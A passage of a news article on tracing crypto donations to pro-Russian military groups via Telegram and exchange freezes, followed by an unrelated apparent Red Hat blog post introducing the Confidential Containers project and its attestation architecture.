In separate reports, the cryptocurrency-tracing firms and Binance’s investigations team each tracked donations to the Russian war effort that very often began with public posts on the messaging app Telegram soliciting crowdfunded donations. Chainalysis, for instance, found Telegram posts from organizations including the pro-Russian media sites Rybar and Southfront, as well as the paramilitary group Rusich—which has ties to the notorious Wagner mercenary group—all posting cryptocurrency donation addresses to Telegram. These posts told followers that the money raised there would be used for everything from weaponized drones to radios, rifle accessories, and body armor. In another instance, Chainalysis points to a fundraiser by a group called Project Terricon that attempted to auction NFTs to support pro-Russian militia groups in Eastern Ukraine, though the NFTs were removed from the marketplace they were hosted on before any bids were placed.

Binance’s investigations team, in its own report, found that a total of $4.2 million in crypto had been funneled to Russian military groups since February. The groups named in its research didn’t entirely overlap with those named in Chainalysis’ report, suggesting that the overall funding could be far greater than either Binance’s or Chainalysis’ total. Binance, for instance, points to a pro-Russian “cultural heritage” group known as MOO Veche that has carried out fundraisers for military equipment similar to the kinds funded by the groups Chainalysis flagged. While Binance, TRM Labs, and Elliptic all name MOO Veche as a major fundraiser, Elliptic traced $1.7 million in crypto donations to the group, far more than the other researchers.

A screenshot of a Russian-language Telegram post from the pro-Russian military MOO Veche group, describing equipment paid for with its fundraising, including “thermal imagers, binoculars with rangefinders, spotting scopes, car radios, collimators and first aid kits.“

Telegram via Andy Greenberg

Other organizations that Binance spotted raising money through cryptocurrency crowdfunding on Telegram include the pro-Russian nationalist groups Save Donbas and REAR, as well as the Russian arms manufacturer Lobaev, which it saw directly soliciting donations on the platform. Yet another group, known as Romanov Light, whose fundraising was spotted by TRM Labs and Elliptic, claimed to be collecting crypto for Russian special forces. Romanov Light raised as much as $330,000 worth of donations, according to Elliptic, which it told donors it spent on military equipment like weapon accessories, flashlights, and armor plates.

Despite the relative clarity of all that financial tracing, preventing cryptocurrency from continuing to bolster Russia’s unprovoked incursion into Ukraine hasn’t been simple. Exchanges can block or freeze funds at the points where they’re exchanged for traditional currency. But according to Chainalysis, the majority of the crypto funds the groups have raised have been cashed out through Russian exchanges, including Chatex, Suex, and Garantex—all of which have already been targeted with Western sanctions for their extensive use by criminals. Chatex and Garantex did not respond to WIRED’s request for comment. Suex no longer appears to have a public website, and no contact information for the exchange could be found.

Not every exchange that has served as an ATM for Russian military crypto crowdfunding is hosted in Russia, however. Blockchain analysts who spoke to WIRED pointed to seven other exchange services, some hosted in India and China, that have received funds from the pro-Russian groups they tracked, though they declined to name them on the record, in part because the amounts of those funds in most cases were in the single-digit thousands or less.

In one telling example of how hard it is to prevent these cash-outs, however, analysts saw MOO Veche send more than $150,000 worth of bitcoin to an exchange hosted on the infrastructure of the Chinese cryptocurrency exchange Huobi—a “nested” exchange that essentially uses Huobi as its trading platform. But any responsibility that Huobi might have for blocking or freezing those funds was complicated by another unknown intermediary service that analysts saw the money travel through before entering the Huobi-hosted service. When WIRED reached out to Huobi for comment, it wrote in a statement that it has a “know-your-customer” process “which ensures to the best of our ability that our clients’ source of funds are above board.”

Binance, for its part, says its exchange accounts were also used by four of the groups it tracked and received more than $208,000 worth of cryptocurrencies. It tells WIRED that it froze all four accounts it discovered. “We’re making sure that no harm comes to civilians as a result of the fundraising that happens in these extremist spaces,” says Jennifer Hicks, who manages Binance’s intelligence and investigations team. “When cryptocurrency exchanges know that something illicit is happening that will end in real-world, kinetic effects like this, it’s the exchange’s responsibility to put a stop to it as fast as possible.”

Even when exchanges do monitor for crypto sent from sanctioned groups like these pro-Russian fundraisers, that dirty money won’t always be straightforward to detect, warns Thibaud Madelin, who leads research at Elliptic. He says he’s increasingly seeing Russian sources of illicit funds use “bridges” or “coin swaps”—services that allow easy trading of one cryptocurrency for another, often without offering any identifying information—as money-laundering techniques. He’s watched those tools grow in popularity among dark-web black markets and cybercriminal users and expects the same will happen with those seeking to launder illicit arms funding. “It’s a bit early to say definitively. But what we’re seeing is that it’s likely to become a bigger problem,” says Madelin. “They’re likely to mirror the methodologies seen across dark net services users, enabling large-scale money laundering and potentially sanctions evasion.”

An image in Chainalysis’s report pulled from a pro-Russian social media fundraiser that shows items funded through cryptocurrency donations, including targeting equipment, drone components, and satellite radios.

Courtesy of Chainanalysis

Millions of dollars in cryptocurrency funding to Russian troops may be the least of Ukraine’s problems in a war where Russia has thrown billions into its invasion force. Ukraine, it’s worth noting, has also vastly out-raised Russia in cryptocurrency: By Elliptic’s count, the Ukrainian government has collected more than $77 million in crypto donations since the war began. But that is to be expected, given the West’s broad support of Ukraine following Russia’s unprovoked aggression and the global sanctions placed on Russia. And even the smaller amount of cryptocurrency Russian forces have raised demonstrates cryptocurrency’s ongoing potential to circumvent those sanctions and offer another financial lifeline to Russia’s war machine.

“It’s not like Russia is buying new tanks with this money. They’re paying for thermal imaging scopes and UAVs,” says Andrew Fierman, a sanctions-focused Chainalysis researcher. “But for grassroots facilitation of these militia efforts, any amount of money that they receive to bolster their gear is going to have an impact.” And despite all the light that cryptocurrency tracers can shine on that funding—and the West’s best efforts to stop it—the crypto flow into Russia’s war chest continues.

The Fight to Cut Off the Crypto Fueling Russia's Ukraine Invasion

Confidential Containers (CoCo) is a new sandbox project of the Cloud Native Computing Foundation (CNCF) that enables cloud-native confidential computing by taking advantage of a variety of hardware platforms and technologies.

Confidential Containers (CoCo) is a new sandbox project of the Cloud Native Computing Foundation (CNCF) that enables cloud-native confidential computing by taking advantage of a variety of hardware platforms and technologies. The project brings together software and hardware companies including Alibaba-cloud, AMD, ARM, IBM, Intel, Microsoft, Red Hat, Rivos and others.  

The CoCo project builds on existing and emerging hardware security technologies such as Intel SGX, Intel TDX, AMD SEV and IBM Z Secure Execution, in combination with new software frameworks **to help better secure user data in use**. This will establish a new level of confidentiality, which does not rely on trust in the cloud providers and their employees, but on hardware-level cryptography. CoCo will support multiple environments including public clouds, on-premise and edge computing.

The goal of the CoCo project is to **standardize** confidential computing at the container level and **simplify** its consumption in Kubernetes. This is in order to enable Kubernetes users to deploy confidential container workloads using familiar workflows and tools without extensive knowledge of underlying confidential computing technologies.

The CoCo project aims to integrate Trusted Execution Environments (TEE) infrastructure with the cloud-native world. A TEE is at the heart of a confidential computing solution. TEEs are isolated environments with enhanced security, provided by confidential computing (CC) capable hardware that prevents unauthorized access or modification of applications and data while in use. You’ll also hear the terms "enclaves", "trusted enclaves" or "secure enclaves." In the context of confidential containers, these terms are used interchangeably.

**What does this actually mean?** 

Using CoCo, you will be able to deploy your workload on infrastructure owned by someone else, significantly reducing the risk of any unauthorized entity accessing your workload data and extracting your secrets. The infrastructure can be owned by a cloud provider, a different division in your organization such as the IT department or even an untrusted third party. This new level of confidentiality is achieved by, among other things, encrypting the computer’s memory and protecting other low level resources your workload requires at the hardware level. This includes the state of the CPU, physical memory, interrupts and more. Cryptography-based proofs help validate that no one has tampered with your workload, loaded software you did not want, read or modified the memory used by your workload, injected a malicious CPU state to attempt to derail your software or succeeded in doing anything out of order. In short, CoCo helps confirm that if either your software runs without being tampered with or it fails to run you will know about it.

For additional details see the CoCo project overview. 

In this blog we will focus on the first community release targeted for September 2022. The next sections provide more insight into what are the goals of this release and the supported use cases. We will also give a short overview of the architecture components supported in this release. 

Detailed release notes are available on the confidential containers GitHub repository.

**Goals of the first release**

This release focuses on the following:

*   **Simplicity** - Using a dedicated Kubernetes operator, the CoCo operator, for deployment and configuration. Our goal is to make this technology as accessible as possible hiding away most of the hardware-dependent parts 
    
*   **Stability** \- Supporting continuous integration (CI) for the key workflows of the release. We want to ensure that as the community grows and more contributors join, existing use cases remain stable.
    
*   **Documentation** - Detailed and clear instruction of how to deploy and use this release. Confidential computing is a vast and evolving field with many acronyms, building blocks and technology layers. We’d like to provide the users with enough information to understand and try out the use cases we describe.
    

Non-goals for the release include:

*   Full support and CI testing for all commonly used hardware architectures.
    
*   Performance and resource optimizations
    
*   Full integration with third-party services for attestation or key brokering
    
*   Full functionality and security features for all standard Kubernetes tools: some commands, notably those that access sensitive data in the workload, may either fail to function (being blocked for security reasons), or still route data through insecure channels.
    
*   Support for upstream versions of containerd and CRIO (this release relies on a customized version of containerd, which the operator installs for you)
    

We expect these limitations to be addressed in subsequent releases.

**Use cases supported in this release**

This release supports the following use cases:

*   Creating a sample CoCo workload
    
*   Creating a CoCo workload using a pre-existing encrypted image
    
*   Creating a CoCo workload using a pre-existing encrypted image on hardware with support for Confidential Computing (CC HW)
    
*   Building a new encrypted container image and deploying it as a CoCo workload
    

**Some insight into the CoCo architecture **

The following diagram provides a high level view of the main components the CoCo solution consists of and interact with: 

The CoCo solution embeds a Kubernetes pod inside a virtual machine (VM) together with an engine called the _**enclave software stack**_. There is a one-to-one mapping between a Kubernetes pod and a VM-based TEE (or enclave). The container images are kept inside the enclave and can be either signed or encrypted.

The **enclave software stack** is _**measured**_, which means that a  trusted cryptographic algorithm is used to authenticate its content. It contains the _**enclave agent**_ which is responsible for initiating attestation and fetching of the secrets from the key management service.

Supporting components for the solution are the _**container image registry**_ and the _**relying party**_, which combines the _**attestation service**_ and _**key management service**_.

The **container image registry** is responsible for storing and delivering encrypted container images. A container image typically contains multiple layers, and each layer is encrypted separately. At least one layer needs to be encrypted for the workload to be efficiently protected.

The **attestation service** is responsible for checking the measurement of the enclave software stack against a list of approved workloads, and authorize or deny the delivery of keys.

The **key management service** is responsible for storing secrets that the workload needs in order to run, such as disk decryption keys, and for delivering these secrets to the enclave agent.

After the VM has been launched, we can then summarize the flow CoCo follows in the following 4 steps (colored in red in the diagram above):

1.  The enclave agent sends a request to the attestation service. The attestation service responds with a cryptographic challenge for the agent to prove the workload’s identity using the measurement of the enclave. If the enclave agent responds to this challenge successfully, the attestation service notifies the key management service that secrets can be delivered.
    
2.  If the workload is authorized to run, the key management service finds the secrets corresponding to the workload, and sends them to the agent. Among the necessary secrets are the decryption keys for the disks being used.
    
3.  The image management service inside the enclave downloads container images from the container images registry, verifies them, and decrypts them locally to encrypted storage. At that point, the container images become usable by the enclave.
    
4.  The enclave software stack creates a pod and containers inside the virtual machine, and starts running the containers (all containers within the pod are secured).
    

**Why is Red Hat investing in this project? **

As part of the move to open hybrid cloud and in an effort to consolidate its relevant security aspects, advancement in technology allows our customers to further protect the data in use by providing an additional layer of encryption. There are certain industries that are highly sensitive and need additional protection for their workloads. As regulatory environments change, Red Hat intends to provide the necessary tools.

Red Hat believes that confidential computing can be a game changer for software manufacturers and cloud providers. It combines the advantages of cloud and on-premise while keeping the processes simple.

CoCo makes these new technologies easier to consume. Being able to transparently integrate confidential containers in Red Hat OpenShift, which is built on Kubernetes, is expected to become an important addition to the Red Hat product portfolio.

Tag

#intel